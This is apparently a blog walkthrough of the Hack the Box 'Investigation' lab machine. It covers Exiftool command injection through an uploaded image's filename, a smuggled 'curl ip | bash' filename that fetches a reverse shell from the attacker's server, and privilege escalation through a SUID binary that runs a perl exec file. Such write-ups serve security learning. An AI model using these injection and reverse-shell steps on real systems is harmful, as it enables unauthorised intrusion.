In this post, I would like to share a walkthrough of the Investigation Machine from Hack the Box
This room will be considered an Insane machine on Hack the Box

What will you gain from the Investigation machine?
For the user flag, you will need to abuse a website that accepts a user-uploaded image which we will run Exiftool on the website. As a result, we found an older version of Exiftool that vulnerable to command injection.
As for the root flag, you need to find a logs on the Windows Event and analyze the log to obtain a password which we will make use of the malware that will runs as root.
Information Gathering on Investigation Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Let’s access the website interface

However, the website doesn’t have many things to explore with


From us roaming just now, we are only aware of the potential username

However, there’s an upload function in the Free Service section.

Let’s find a jpg file and use it for uploading on the application.


As shown in the screenshot above, we have uploaded the jpg file to the application
Exiftool vulnerability

I did notice that there is Exiftool version is been vulnerable and the exploit can be found here


We can try to cp the jpg file to some command injection which will try to curl a file from our attacker’s machine

Let’s start our Python server

We also can insert the reverse shell into a new file that saves in HTML format

Let’s execute our listener with pwncat

Therefore, let’s upload the file that name as curl ip | bash |

It will look something like the above on burpsuite request

Once the file is successfully uploaded to the application, we will be getting the output as shown above.

When we are looking back on the Python server, it shows that the application is retrieving our HTML file

Boom! We managed to obtain the reverse shell connection back to us

We notice that the only user available on the machine is smorton


Let’s upload pspy64 into our victim’s machine to see any process that we can abuse

We should be giving the execution permission to the file and running it


From the pspy64 output, i notice that there’s a file that looks suspicious which is /var/www/html


As a result, let’s access the folder to see what is stored inside there.

There’s nothing saved inside the analysed_log file

It’s hard to read when you try to string the file content

The msg file is a CDFV2 Microsoft Outlook Message


Therefore, we should convert the msg file to eml file format

We can read the content of the file by opening either Outlook or LibreOffice



Next, we need to unzip the file and managed to find a password from all those information



We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access

As usual, we can find any malicious SUID binary by running the command “sudo -l”

We can analyze the SUID binary by using IDA pro or Ghidra but I will just use string to capture the useful information from the file

As a result, let’s create a perl file that will contain the content of exec(“any command”)

Let’s execute the SUID binary with the perl file and passcode


We can read the root flag by typing the “cat root.txt” command
Extra Information
